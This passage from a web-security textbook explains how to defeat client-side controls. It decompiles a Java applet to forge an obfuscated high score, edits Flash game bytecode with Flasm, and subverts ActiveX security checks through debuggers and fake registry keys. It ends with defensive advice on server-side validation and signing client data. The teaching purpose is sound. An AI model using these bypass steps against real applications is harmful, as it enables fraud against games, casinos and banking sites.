the code attribute of the applet tag shown previously.

There are various tools available that can decompile Java bytecode. The fol-

lowing example shows partial output from one such tool, Jad:

E:\>jad.exe JavaGame.class

Parsing JavaGame.class... Generating JavaGame.jad

E:\>type JavaGame.jad

// Jad home page: http://www.kpdus.com/jad.html

// Decompiler options: packimports(3)

// Source File Name: JavaGame.java

import java.applet.Applet;
import java.awt.Graphics;

public class JavaGame extends Applet
{
    public int getScore()
    {
        play();
        return score;
    }

    public String getObsScore()
    {
        return obfuscate(Integer.toString(score) + "|" +
            Double.toString(Math.random()));
    }

    public static String obfuscate(String input)
    {
        return hexEncode(checksum(input) + scramble(input));
    }

    private static String scramble(String input)
    {
        StringBuffer output = new StringBuffer();
        for(int i = 0; i < input.length(); i++)
            output.append((char)((input.charAt(i) - 3) + i * 4));
        return output.toString();
    }

    private static String checksum(String input)
    {
        char checksum = '\0';
        for(int i = 0; i < input.length(); i++)
        {
            checksum ^= input.charAt(i);
            checksum <<= '\002';
        }
        return new String(new char[] {
            (char)(checksum / 256), (char)(checksum % 256)
        });
    }

    ...

NOTE For various reasons, Jad sometimes does not do a perfect job of

decompiling bytecode, and you may need to tidy up some of its output before it

can be recompiled.

With access to this source code, you can immediately see how your score is

converted into a long obfuscated string that has the characteristics observed.

The applet first appends some random data to your score (separated by the

pipe character). It takes a checksum of the resulting string, and also scrambles

it. It then prepends the checksum to the scrambled string and finally hex-

encodes the result for safe transmission within a URL parameter.

The addition of some random data accounts for the length and unpre-

dictability of the obfuscated string, and the addition of a checksum explains

why changing any part of the obfuscated string causes the server-side decoder

to reject it.
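The description above can be checked with a small standalone reimplementation. The sketch below copies the scramble and checksum arithmetic from the decompiled listing. The hexEncode method is not shown in the extract, so the version here (two lowercase hex digits per character) is an assumption, as are the class name and the deobfuscate method, which only illustrates how a server-side decoder might reverse the process and is not taken from the application.

```java
/** Sketch only: mirrors the decompiled logic; hexEncode and deobfuscate are assumptions. */
final class ObfuscationSketch {

    static String obfuscate(String input) {
        return hexEncode(checksum(input) + scramble(input));
    }

    // Same arithmetic as the decompiled scramble(): each character moves by (4 * i - 3).
    static String scramble(String input) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
            out.append((char) ((input.charAt(i) - 3) + i * 4));
        }
        return out.toString();
    }

    // Same arithmetic as the decompiled checksum(): XOR, then shift left by two, in a 16-bit char.
    static String checksum(String input) {
        char checksum = 0;
        for (int i = 0; i < input.length(); i++) {
            checksum ^= input.charAt(i);
            checksum <<= 2;
        }
        return new String(new char[] { (char) (checksum / 256), (char) (checksum % 256) });
    }

    // Assumed encoding: every character is below 256 and becomes two lowercase hex digits.
    static String hexEncode(String input) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
            out.append(String.format("%02x", (int) input.charAt(i)));
        }
        return out.toString();
    }

    /** Hypothetical inverse: returns the plaintext, or null if the value is malformed or the checksum fails. */
    static String deobfuscate(String hex) {
        if (hex == null || hex.length() < 4 || hex.length() % 2 != 0) {
            return null;
        }
        StringBuilder raw = new StringBuilder();
        try {
            for (int i = 0; i < hex.length(); i += 2) {
                raw.append((char) Integer.parseInt(hex.substring(i, i + 2), 16));
            }
        } catch (NumberFormatException e) {
            return null;
        }
        String sum = raw.substring(0, 2);
        StringBuilder plain = new StringBuilder();
        for (int i = 2; i < raw.length(); i++) {
            // Undo the scramble step for the character at position (i - 2).
            plain.append((char) (raw.charAt(i) + 3 - (i - 2) * 4));
        }
        String text = plain.toString();
        return checksum(text).equals(sum) ? text : null;
    }

    public static void main(String[] args) {
        String token = obfuscate("99999|0.123456789");
        System.out.println(token);
        System.out.println(deobfuscate(token));
    }
}
```

Because the random suffix is simply whatever follows the pipe character, any value of the form score|suffix can be fed to obfuscate, which is the basis of the attacks that follow.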

Having decompiled the applet back to its source code, you can leverage this
in various ways to bypass the client-side controls and submit an arbitrary
high score to the server:

■■

You can modify the decompiled source to change the behavior of the

applet, recompile it to bytecode, and modify the source code of the

HTML page to load the modified applet in place of the original. For
example, you could change the getObsScore method to:

return obfuscate("99999|0.123456789");

To recompile your modified code, you should use the Java compiler

javac provided with Sun’s Java SDK.

■■

You can add a main method to the decompiled source to provide the

functionality to obfuscate arbitrary inputs:

public static void main(String[] args)

{

System.out.println(obfuscate(args[0]));

}

You can then run the recompiled bytecode from the command line to
obfuscate any score you like:

E:\>java JavaGame "99999|0.123456789"

6ca4363a3e42468d45474e53585d62676c7176

■■

You can review the public methods exposed by the applet to determine

whether any of them can be leveraged to achieve your objectives with-

out actually modifying the applet. In the present case, you can see that

the

obfuscate method is marked as public, meaning that you can call it

directly from JavaScript with arbitrary input. Hence, you can submit

your chosen score simply by modifying the source code of the HTML

page as follows:

function play()
{
    alert("you scored " + TheApplet.getScore());
    document.location = "submitScore.jsp?score=" +
        TheApplet.obfuscate("99999|0.123456789") + "&name=" +
        document.playForm.yourName.value;
}

TIP Often, Java applets are packed up as JAR (Java ARchive) files, which
contain multiple class files and other resources such as sounds and images.
JAR files are really just ZIP archives with the .jar file extension. You can
unpack and repack them using standard archive tools like WinRAR or WinZip,
or using the jar tool, which is included in Sun’s Java SDK.
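Because a JAR is an ordinary ZIP archive, you can also inspect one programmatically. The following is a minimal sketch using the standard java.util.zip classes. To keep it runnable without a real applet, it builds a tiny archive in memory; the entry names and the class name JarLister are made up for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

/** Sketch: treats a JAR as the ZIP archive it is and lists the entries inside. */
final class JarLister {

    /** Reads a JAR/ZIP stream and returns the names of all entries in archive order. */
    static List<String> listEntries(InputStream jar) {
        List<String> names = new ArrayList<>();
        try (ZipInputStream zip = new ZipInputStream(jar)) {
            ZipEntry entry;
            while ((entry = zip.getNextEntry()) != null) {
                names.add(entry.getName());
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return names;
    }

    /** Builds a small in-memory archive with hypothetical entries, standing in for a downloaded JAR. */
    static byte[] sampleArchive() {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ZipOutputStream zip = new ZipOutputStream(bytes)) {
            zip.putNextEntry(new ZipEntry("JavaGame.class"));
            // Placeholder content only: the four magic bytes that begin every class file.
            zip.write(new byte[] { (byte) 0xCA, (byte) 0xFE, (byte) 0xBA, (byte) 0xBE });
            zip.closeEntry();
            zip.putNextEntry(new ZipEntry("sounds/win.wav"));
            zip.closeEntry();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bytes.toByteArray();
    }

    public static void main(String[] args) {
        System.out.println(listEntries(new ByteArrayInputStream(sampleArchive())));
    }
}
```

To examine a JAR saved from a target application, you would pass a FileInputStream for that file to listEntries instead of the in-memory sample.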

TIP Other useful tools for analyzing and manipulating Java applets are Jode

(a decompiler and bytecode obfuscator) and JSwat (a Java debugger).

HACK STEPS

■ Review all calls made to an applet’s methods, and determine whether

data returned from the applet is being submitted to the server.

■ If that data is transparent in nature (i.e., is not obfuscated or encrypted),

probe and attack the server’s processing of the submitted data in the

same way as for any other parameter.

■ If the data is opaque, decompile the applet to obtain its source code.

■ Review the relevant source code (starting with the implementation of the

method that returns the opaque data) to understand what processing is

being performed.

■ Determine whether the applet contains any public methods that can be

used to perform the relevant obfuscation on arbitrary input.

■ If not, modify and recompile the applet’s source in such a way as to neu-

tralize any validation it performs or allow you to obfuscate arbitrary

input.

■ Then, submit various suitably obfuscated attack strings to the server to

probe for vulnerabilities, as you would for any other parameter.
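The step of looking for usable public methods can be done without reading any decompiled source, by using Java reflection on the class file. The sketch below is illustrative only: GameStandIn is a hypothetical stand-in whose method names mirror the decompiled example, and PublicMethodLister is an assumed helper name.

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

/** Sketch: lists the public methods a class declares, as a first look at what a page could call. */
final class PublicMethodLister {

    /** Stand-in for a downloaded applet class; the bodies are placeholders. */
    static class GameStandIn {
        public int getScore() { return 0; }
        public String getObsScore() { return ""; }
        public static String obfuscate(String input) { return input; }
        private static String scramble(String input) { return input; }
    }

    /** Returns sorted "name(paramTypes)" strings for the public methods declared by the class itself. */
    static List<String> publicMethods(Class<?> type) {
        List<String> found = new ArrayList<>();
        for (Method m : type.getDeclaredMethods()) {
            if (!Modifier.isPublic(m.getModifiers()) || m.isSynthetic()) {
                continue;
            }
            StringBuilder sig = new StringBuilder(m.getName()).append('(');
            Class<?>[] params = m.getParameterTypes();
            for (int i = 0; i < params.length; i++) {
                if (i > 0) {
                    sig.append(", ");
                }
                sig.append(params[i].getSimpleName());
            }
            found.add(sig.append(')').toString());
        }
        Collections.sort(found);
        return found;
    }

    public static void main(String[] args) {
        System.out.println(publicMethods(GameStandIn.class));
    }
}
```

For a real applet, you would load the saved class with a class loader such as URLClassLoader and pass the resulting Class object to publicMethods. Only do this with code you are prepared to load into your own JVM.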

Coping with Bytecode Obfuscation

Because of the ease with which Java bytecode can be decompiled to recover its

source, various techniques have been developed to obfuscate the bytecode

itself. Applying these techniques results in bytecode that is harder to decom-

pile or that decompiles to misleading or invalid source code that may be very

difficult to understand and impossible to recompile without substantial effort.

For example:

package myapp.interface;

import myapp.class.public;

import myapp.interface.else.class;

import myapp.throw.throw;

import if.if.if.if.else;

import if.if.if.if.if;

import java.awt.event.KeyEvent;

public class double extends public implements strict

{

public double(j j1)

{

_mthif();

_fldif = j1;

}

private void _mthif(ActionEvent actionevent)

{

_mthif(((KeyEvent) (null)));

switch(_fldif._mthnew()._fldif)

{

case 0:

_fldfloat.setEnabled(false);

_fldboolean.setEnabled(false);

_fldinstanceof.setEnabled(false);

_fldint.setEnabled(false);

break;

case 3:

_fldfloat.setEnabled(true);

_fldboolean.setEnabled(true);

_fldinstanceof.setEnabled(false);

_fldint.setEnabled(false);

break;

...

The obfuscation techniques commonly employed are as follows:

■■

Meaningful class, method, and member variable names are replaced

with meaningless expressions like a, b, c. This forces the reader of

decompiled code to identify the purpose of each item by studying how

it is used, and can make it very difficult to keep track of different items

while tracing them through the source code.

■■

Going further, some obfuscators replace item names with Java keywords
such as new and int. Although this technically renders the bytecode
illegal, most JVMs will tolerate the illegal code and it will execute

normally. However, even if a decompiler can handle the illegal byte-

code, the resulting source code will be even less readable than that

described in the previous point. More importantly, the source will not

be recompilable without extensive reworking to rename illegally named

items in a consistent manner.

■■

Many obfuscators strip unnecessary debug and meta-information from

the bytecode, including source file names and line numbers (which

makes stack traces less informative), local variable names (which frus-

trates debugging), and inner class information (which stops reflection

from working properly).

■■

Redundant code may be added that creates and manipulates various
kinds of data in significant-looking ways but that is independent of
the real data actually being used by the application’s functionality.

■■

The path of execution through code can be modified in convoluted

ways, through the use of jump instructions, so that the logical sequence

of execution is hard to discern when reading through the decompiled

source.

■■

Illegal programming constructs may be introduced, such as unreach-

able statements, and code paths with missing return statements. Most

JVMs will tolerate these phenomena in bytecode, but the decompiled

source cannot be recompiled without correcting the illegal code.

HACK STEPS

Effective tactics for coping with bytecode obfuscation depend upon the

techniques used and the purpose for which you are analyzing the source. Here

are some suggestions:

■ You can review an applet for public methods without fully understanding

the source. It should be obvious which methods can be invoked from

JavaScript, and what their signatures are, enabling you to test the behav-

ior of the methods by passing in various inputs.

■ If class, method, and member variable names have been replaced with

meaningless expressions (but not Java keywords), then you can use the

refactoring functionality built into many IDEs to assist you in understand-

ing the code. By studying how items are used, you can start to assign

them meaningful names. If you use the “rename” tool within the IDE, it

will do a lot of work for you, tracing the use of the item throughout the

codebase and renaming it everywhere.

■ You can actually undo a lot of obfuscation by running the obfuscated

bytecode through an obfuscator a second time and choosing suitable

options. A useful obfuscator to use here is Jode, which can remove

redundant code paths added by another obfuscator, and facilitate the

process of understanding obfuscated names by assigning globally unique

names to items.
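Where an obfuscator has used Java keywords as names, the decompiled source must be renamed consistently before it will compile. The sketch below shows one simple, deterministic mapping, assuming a kw_ prefix does not collide with any name already in the code. The class and method names are hypothetical, and a real cleanup would need to apply the mapping to identifiers only, not to genuine uses of the keywords.

```java
import javax.lang.model.SourceVersion;

/** Sketch: maps keyword-named items to legal identifiers in a repeatable way. */
final class KeywordRenamer {

    /** Returns the name unchanged unless it is a Java keyword or literal, in which case it is prefixed. */
    static String legalName(String name) {
        return SourceVersion.isKeyword(name) ? "kw_" + name : name;
    }

    /** Applies legalName to each segment of a dotted package or class name. */
    static String legalDottedName(String dotted) {
        String[] parts = dotted.split("\\.");
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < parts.length; i++) {
            if (i > 0) {
                out.append('.');
            }
            out.append(legalName(parts[i]));
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Names taken from the obfuscated import statements shown earlier.
        System.out.println(legalDottedName("myapp.throw.throw"));
        System.out.println(legalDottedName("if.if.if.if.else"));
        System.out.println(legalDottedName("java.awt.event.KeyEvent"));
    }
}
```

Because the mapping depends only on the name itself, every occurrence of a given item receives the same replacement, which is the property that matters when the code is recompiled.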

ActiveX Controls

ActiveX controls are a much more heavyweight technology than Java applets.

They are effectively native Win32 executables that, once accepted and installed

by the user, execute with the full privileges of that user and can carry out arbi-

trary actions, including interacting with the operating system.

ActiveX can be used to implement practically any client-side control,

including capturing user input and other in-browser data, and verifying that

the client computer meets certain security standards before allowing access to

some function.

From the point of view of HTML page source, ActiveX controls are instanti-

ated and invoked in a very similar way to Java applets. For example, if you

have installed the Adobe Acrobat plug-in for Internet Explorer, the following

code will display a dialog showing the version of Acrobat installed:

<object id="TheAxControl"
    classid="CLSID:4F878398-E58A-11D3-BEE9-00C04FA0D6BA">
</object>
<form>
<input type="button" value="Show version"
    onclick="JavaScript:alert(document.TheAxControl.AcrobatVersion)">
</form>

In addition to looking for code like this, you can easily identify instances

where an application attempts to install a new ActiveX control, because your

browser will present an alert asking for your permission to install it.

NOTE Poorly written ActiveX controls have been a major source of security

vulnerabilities in recent years, and unwitting users who install defective

controls often leave themselves open to full system compromise at the hands

of any malicious web site that invokes and exploits the control. In Chapter 12,

we describe how you can find and exploit common vulnerabilities in ActiveX

controls to attack other users of an application.

There are various techniques that can be used to circumvent client-side con-

trols implemented using ActiveX.

Reverse Engineering

Because ActiveX controls are typically written in native languages like C and

C++, they cannot be trivially decompiled back to source code in the way that

Java applets can be. Nevertheless, because all of the processing performed by

an ActiveX control occurs on the client computer, it is in principle possible for

a user on that computer to fully scrutinize and control that processing, thereby

circumventing any security functions that it implements.

Reverse engineering is a complex and advanced topic, which extends

beyond the scope of this book. However, there are some basic techniques that

even a relatively inexperienced reverse engineer can use to defeat the client-

side security mechanisms implemented within many ActiveX controls.

HACK STEPS

■

Rather than pursuing a full static disassembly of the component’s code, use

an intuitive GUI-based debugger to monitor and control its execution at run-

time. For example, OllyDbg is an accessible yet powerful debugger that can

be used to achieve many kinds of attacks on compiled software at runtime:

■ Identify the methods exported by the control and its subcomponents,

and also any interesting operating system functions which the control

imports — in particular, any cryptographic functions. Set breakpoints on

these functions within the debugger.

■ When a breakpoint is hit, review the call stack to identify any relevant

data being passed to the function — in particular, any user-supplied data

that is being subjected to validation. By tracing the path of this data,

attempt to understand the processing being performed on it.

■ It is often easy to use a debugger to subvert the execution path of a

process in useful ways — for example, by modifying the parameters on

the stack being passed as inputs to a function, modifying the EAX regis-

ter used to pass the return value back from a function, or rewriting key

instructions like comparisons and jumps to change the logic imple-

mented within a function. If possible, use these techniques to circumvent

validation controls, causing potentially malicious data to be accepted for

further processing.

■ If data validation is performed before further manipulation such as

encryption or obfuscation, you can exploit this separation by supplying

valid data to the control, and then intercept and modify the data after it

has passed the validation steps, so that your potentially malicious data is

appropriately manipulated before being transmitted to the server-side

application.

■ If you find a means of manually altering the control’s processing to

defeat the validation it is performing, you can automate the execution of

this attack either by modifying the control’s binary on-disk (OllyDbg has

a facility to update binaries to reflect changes you have made to its code

within the debugger) or by hooking into the target process at runtime,

using an instrumentation framework such as Microsoft Detours.

The following are some useful resources if you’d like to find out more about

reverse engineering and related topics:

■■

Reversing: Secrets of Reverse Engineering by Eldad Eilam

■■

Hacker Disassembling Uncovered by Kris Kaspersky

■■

The Art of Software Security Assessment by Mark Dowd, John McDonald,

and Justin Schuh

■■

www.acm.uiuc.edu/sigmil/RevEng

■■

www.uninformed.org/?v=1&a=7

Manipulating Exported Functions

As with Java applets, it may be possible to manipulate and repurpose an

ActiveX control’s processing solely by invoking methods that it exposes to the

browser through its normal interface.

ActiveX controls may expose numerous methods that the application never

actually invokes from HTML, which you may not be aware of without exam-

ining the control itself. COMRaider by iDefense is a useful tool that can dis-

play all of a control’s methods and their signatures, as shown in Figure 5-7.

Figure 5-7: COMRaider showing the methods exposed by an ActiveX control

HACK STEPS

■ Developers typically use meaningful names for ActiveX methods, and it

may be possible to identify useful methods simply from their names.

■ You can sometimes determine the purpose of a function by systemati-

cally invoking it with different inputs and monitoring both the visible

behavior of the control and its internal workings using your debugger.

Fixing Inputs Processed by Controls

ActiveX controls are commonly used as a client-side control to verify that
the client computer complies with specific security standards before access
is granted to certain server-side functionality. For example, in an attempt
to mitigate keylogging attacks, an online banking application may install a
control that checks for the presence of a virus scanner, and the operating
system patch level, before permitting a user to log in to the application.

If you need to circumvent this type of client-side control, it is usually easy to

do. The ActiveX control will typically read various details from the local com-

puter’s file system and registry as input data for its checks. You can monitor

the information being read and feed arbitrary inputs into the control that com-

ply with its security checks.

The Filemon and Regmon tools originally developed by Sysinternals (and

now owned by Microsoft) enable you to monitor all of a process’s interaction

with the computer’s file system and registry. You can filter the tools’ output to

display only the activity of the process you are interested in. When an ActiveX

control is performing security checks on the client computer, you will typically

see it querying security-relevant files and registry keys, such as items created

by antivirus products, as shown in Figure 5-8.

Figure 5-8: Regmon being used to capture the registry access carried

out by an ActiveX control

In this situation, it is usually sufficient to manually create the relevant file or

registry key, to convince the control that the corresponding software is installed.

If for some reason you do not wish to interfere with the actual operating system,

you can achieve the same effect using the debugging or instrumentation tech-

niques described previously, to fix the data returned to the control by the rele-

vant file system or registry APIs.

Decompiling Managed Code

Occasionally, you may encounter thick-client components written in C#. As

with Java applets, these can normally be decompiled to recover the original

source code.

A useful tool for performing this task is .NET Reflector by Lutz Roeder (see

Figure 5-9).

Figure 5-9: The .NET Reflector tool being used to decompile an

ActiveX control written in C#

Similar code obfuscation issues can arise in relation to C# assemblies as arise

with Java bytecode.

Shockwave Flash Objects

Flash is very popular on the Internet. It is often used as a means of providing

increased interactivity in informational web sites, but it is also employed in

web applications. Some online stores have Flash-based user interfaces, and it

is often used in jukebox software such as Pandora radio. The most common

use of Flash in an application context is in online games. These vary in nature

from purely recreational games to serious casino functionality, where real

money is involved. Many such games have been targeted by correspondingly

recreational and serious attackers.

Given what we have observed about the fallible nature of client-side con-

trols, the idea of implementing an online gambling application using a thick-

client component that runs locally on a potential attacker’s machine is an

intriguing one. If any aspect of the game play is controlled within the Flash

component instead of by the server, an attacker could manipulate the game

with fine precision to improve odds, change the rules, or alter the scores sub-

mitted back to the server.

Like the other thick-client components examined, Flash objects are con-

tained within a compiled file that the browser downloads from the server and

executes in a virtual machine, which in this case is a Flash player implemented

in a browser plug-in. The SWF file contains bytecode that is interpreted by the

Flash VM (virtual machine), and as with Java bytecode, this can be decompiled

to recover the original ActionScript source code, using appropriate tools. An

alternative means of attack, which is often more effective, is to disassemble

and modify the bytecode itself, without actually fully decompiling it to source.

Flasm is a disassembler and assembler for SWF bytecode and can be used to

extract a human-readable representation of the bytecode from an SWF file and

then reassemble modified bytecode into a new SWF file:

C:\flash>flasm

Flasm 1.61 build May 31 2006

Usage: flasm [command] filename

Commands:

-d Disassemble SWF file to the console

-a Assemble Flasm project (FLM)

-u Update SWF file, replace Flasm macros

-b Assemble actions to __bytecode__ instruction or byte sequence

-z Compress SWF with zLib

-x Decompress SWF

Backups with $wf extension are created for altered SWF files.

To save disassembly or __bytecode__ to file, redirect it:

flasm -d foo.swf > foo.flm

flasm -b foo.txt > foo.as

Read flasm.html for more information.

The following example shows Flasm being used to extract a human-

readable representation of bytecode from an SWF file for a simple Flash-based

car racing game:

C:\flash>flasm -d racer.swf > racer.flm

C:\flash>more racer.flm

movie 'racer.swf' compressed // flash 7, total frames: 3, frame rate: 24 fps, 640x500 px

  exportAssets
    1 as 'engineStart'
  end // of exportAssets

  exportAssets
    2 as 'engineLoop'
  end // of exportAssets

  frame 0
    stop
    push 'car1'
    getVariable
    push 'code', 'player'
    setMember
    push 'totalLaps', 10
    setVariable
    push 'acceleration', 1.9
    setVariable
    push 'gravity', 0.4
    setVariable
    push 'speedDecay', 0.96
    setVariable
    push 'rotationStep', 10
    setVariable
    push 'maxSpeed', 10
    setVariable
    push 'backSpeed', 1
    setVariable
    push 'currentCheckpoint1', 1
    setVariable
    push 'currentLap1', 0.0
    setVariable
    push 'checkpoints', 2
    setVariable
    push 'currentLapTXT', '1/10'
    setVariable
  end // of frame 0

  frame 0
    constants 'car', 'code', 'player', 'speed', 'speedDecay', 'Key', 'isDown', '

...

Here, you can immediately see various bytecode instructions that are of
interest to someone wishing to attack and modify the game. For example, you
could change the value of the maxSpeed variable from 10 to something a bit
more competitive. After doing this, the modified disassembly can then be
converted back into bytecode in a new SWF file, as follows:

C:\flash>flasm -a racer.flm
racer.flm successfully assembled to racer.swf, 31212 bytes

The car should now virtually fly around the track (to make it literally fly,
you could try changing the gravity variable!).
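The edit to the disassembly can be made in any text editor, but it is also easy to script if you want to try several values. The following sketch rewrites the number in a push line for a named variable. It assumes the disassembly uses plain ASCII apostrophes and the push 'name', value layout shown above; the class name, method name, and replacement value are hypothetical.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Sketch: changes the numeric constant pushed for one variable in Flasm-style disassembly text. */
final class FlmPatcher {

    /** Replaces the number in every line of the form: push 'variable', number */
    static String setPushedValue(String disassembly, String variable, String newValue) {
        Pattern line = Pattern.compile(
            "(?m)^([ \\t]*push[ \\t]+'" + Pattern.quote(variable) + "',[ \\t]*)[-0-9.]+[ \\t]*$");
        return line.matcher(disassembly)
                   .replaceAll("$1" + Matcher.quoteReplacement(newValue));
    }

    public static void main(String[] args) {
        String flm = "push 'maxSpeed', 10\nsetVariable\npush 'backSpeed', 1\nsetVariable\n";
        // Only the maxSpeed line is altered; the other lines pass through untouched.
        System.out.print(setPushedValue(flm, "maxSpeed", "50"));
    }
}
```

The patched text would then be saved back to the .flm file and reassembled with flasm -a as shown above.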

In the previous example, the functionality implemented within the Flash

object was sufficiently simple that an attacker could fundamentally reengineer

the object by inspecting the disassembled bytecode and changing a single vari-

able. In more complex Flash objects, this may not be possible, and it may be

necessary to recover the original source and review it in detail to discover how

the object works and where best to attack it. The Flare tool can be used to

decompile an SWF file back into the original ActionScript source:

C:\flash>flare racer.swf && more racer.flr
movie 'racer.swf' {
// flash 7, total frames: 3, frame rate: 24 fps, 640x500 px, compressed

  frame 1 {
    stop();
    car1.code = 'player';
    totalLaps = 10;
    acceleration = 1.9;
    gravity = 0.4;
    speedDecay = 0.96;
    rotationStep = 10;
    maxSpeed = 10;
    backSpeed = 1;
    currentCheckpoint1 = 1;
    currentLap1 = 0;
    checkpoints = 2;
    currentLapTXT = '1/10';
  }

...

While modifying recreational games is usually straightforward, and may be
fun for personal amusement or for beating a coworker, the client-side controls
implemented within the Flash objects used by enterprise applications and
online casinos are typically better protected. As with Java, obfuscation
techniques have been devised in an attempt to hinder decompilation attacks. Two

available tools are ActionScript Obfuscator and Viewer Screwer, which can

change both meaningful variable names and text references into scrambled

sequences of letters, making the decompiled code harder to understand.

The tools described can be obtained from:

■■

Flasm — www.nowrap.de/flasm

■■

Flare — www.nowrap.de/flare

■■

ActionScript Obfuscator — www.genable.com/aso.html

■■

Viewer Screwer — www.debreuil.com/vs

HACK STEPS

■ Explore the functionality of the Flash object within your browser. Use an

intercepting proxy to monitor any requests made to the server, to under-

stand which actions are executed entirely within the client-side compo-

nent itself and which may involve some server-side processing and

controls.

■ Any time you see data being submitted to the server, determine whether

this is transparent in nature, or has been obfuscated or encrypted in

some way. If the former is the case, you can bypass any controls imple-

mented within the object by simply modifying this data directly.

■ If the data that the object submits is opaque in nature, use Flasm to dis-

assemble the object into human-readable bytecode, and use Flare to

decompile the object into ActionScript source.

■ As with decompiled Java applets, review the bytecode and source to

identify any attack points that will enable you to reengineer the Flash

object and bypass any controls implemented within it.

Handling Client-Side Data Securely

As you have seen, the core security problem with web applications arises

because client-side components and user input are outside of the server’s

direct control. The client, and all of the data received from it, is inherently

untrustworthy.

Transmitting Data via the Client

Many applications leave themselves exposed because they transmit critical

data such as product prices and discount rates via the client in an unsafe

manner.

If possible, applications should avoid transmitting this kind of data via the

client altogether. In virtually any conceivable scenario, it is possible to hold

such data on the server, and reference it directly from server-side logic when

needed. For example, an application that receives users’ orders for various
products should allow users to submit a product code and quantity, and

look up the price of each requested product in a server-side database. There is

no need for users to submit the prices of items back to the server. Even where

an application offers different prices or discounts to different users, there is no

need to depart from this model. Prices can be held within the database on a

per-user basis, and discount rates can be stored in user profiles or even session

objects. The application already possesses, server-side, all of the information it

needs to calculate the price of a specific product for a specific user — it must,

otherwise it would not be able, on the insecure model, to store this price in a

hidden form field.
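The server-side model described above can be sketched in a few lines. In this minimal Java example, the request supplies only a product code and a quantity, and the price comes from data held on the server. The product codes, prices, quantity limit, and class name are all hypothetical, and the in-memory map stands in for a database lookup.

```java
import java.math.BigDecimal;
import java.util.Map;

/** Sketch: the client supplies a product code and quantity; the price never leaves the server. */
final class OrderPricing {

    // Hypothetical catalogue; a real application would query its database instead.
    private static final Map<String, BigDecimal> PRICES = Map.of(
        "WIDGET-1", new BigDecimal("449.00"),
        "WIDGET-2", new BigDecimal("19.99"));

    /** Computes the order total from server-held prices; no price is accepted from the client. */
    static BigDecimal orderTotal(String productCode, int quantity) {
        BigDecimal unitPrice = productCode == null ? null : PRICES.get(productCode);
        if (unitPrice == null) {
            throw new IllegalArgumentException("unknown product");
        }
        if (quantity < 1 || quantity > 100) {
            throw new IllegalArgumentException("invalid quantity");
        }
        return unitPrice.multiply(BigDecimal.valueOf(quantity));
    }

    public static void main(String[] args) {
        System.out.println(orderTotal("WIDGET-2", 3));
    }
}
```

Per-user prices or discounts fit the same shape: the lookup simply takes the authenticated user's identity from the session as an additional key, rather than trusting anything sent in the request.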

If developers decide they have no alternative but to transmit critical data via

the client, then the data should be signed and/or encrypted to prevent tam-

pering by the user. If this course of action is taken, then there are two impor-

tant pitfalls to avoid:

■■

Some ways of using signed or encrypted data may be vulnerable

to replay attacks. For example, if the product price is encrypted

before being stored in a hidden field, it may be possible to copy the

encrypted price of a cheaper product, and submit this in place of the

original price. To prevent this attack, the application needs to include

sufficient context within the encrypted data to prevent it from being

replayed in a different context. For example, the application could con-

catenate the product code and price, encrypt the result as a single item,

and then validate that the encrypted string submitted with an order

actually matches the product being ordered.

■■

If users know and/or control the plaintext value of encrypted strings

that are sent to them, then they may be able to mount various crypto-

graphic attacks to discover the encryption key being used by the server.

Having done this, they can encrypt arbitrary values and fully circum-

vent the protection offered by the solution.
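The first pitfall, binding the protected value to its context, can be illustrated with a signature rather than encryption. The sketch below is one possible approach, not the only one: it signs the product code and price together using HMAC-SHA256 from the standard javax.crypto API, so a token issued for one product does not verify for another. The class name, field layout, and sample values are hypothetical. It assumes the separator character cannot appear in a product code, and it does not address expiry or key management.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

/** Sketch: a tamper-evident token that ties a price to the product it was issued for. */
final class PriceToken {

    private final SecretKeySpec key;

    PriceToken(byte[] secret) {
        this.key = new SecretKeySpec(secret, "HmacSHA256");
    }

    /** Signs the product code and price as a single item. */
    String sign(String productCode, String price) {
        return hex(mac(productCode + "|" + price));
    }

    /** Recomputes the signature for the submitted product and price and compares in constant time. */
    boolean verify(String productCode, String price, String token) {
        if (token == null) {
            return false;
        }
        byte[] expected = sign(productCode, price).getBytes(StandardCharsets.US_ASCII);
        byte[] supplied = token.getBytes(StandardCharsets.US_ASCII);
        return MessageDigest.isEqual(expected, supplied);
    }

    private byte[] mac(String message) {
        try {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(key);
            return mac.doFinal(message.getBytes(StandardCharsets.UTF_8));
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    private static String hex(byte[] bytes) {
        StringBuilder out = new StringBuilder();
        for (byte b : bytes) {
            out.append(String.format("%02x", b & 0xff));
        }
        return out.toString();
    }

    public static void main(String[] args) {
        PriceToken tokens = new PriceToken("demo-only-secret".getBytes(StandardCharsets.UTF_8));
        String cheap = tokens.sign("PEN-01", "1.50");
        System.out.println(tokens.verify("PEN-01", "1.50", cheap));   // token matches its own product
        System.out.println(tokens.verify("LAPTOP-9", "1.50", cheap)); // replayed against another product
    }
}
```

A keyed hash of this kind also avoids handing users ciphertext for plaintext they already know, although the secret must still be long, random, and held only on the server.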

In applications running on the ASP.NET platform, it is advisable to never

store any customized data within the ViewState, and certainly never anything

sensitive that you would not want to be displayed on-screen to users. The

option to enable the ViewState MAC should always be activated.

Validating Client-Generated Data

Data generated on the client and transmitted to the server cannot in principle

be validated securely on the client:

■■

Lightweight client-side controls like HTML form fields and JavaScript

can be trivially circumvented, and provide no assurance about

the input received by the server.

■■

Controls implemented in thick-client components are sometimes more

difficult to circumvent, but this may merely slow down an attacker for a

short period.

■■

Using heavily obfuscated or packed client-side code provides addi-

tional obstacles; however, a determined attacker will always be able to

overcome these. (A point of comparison in other areas is the use of

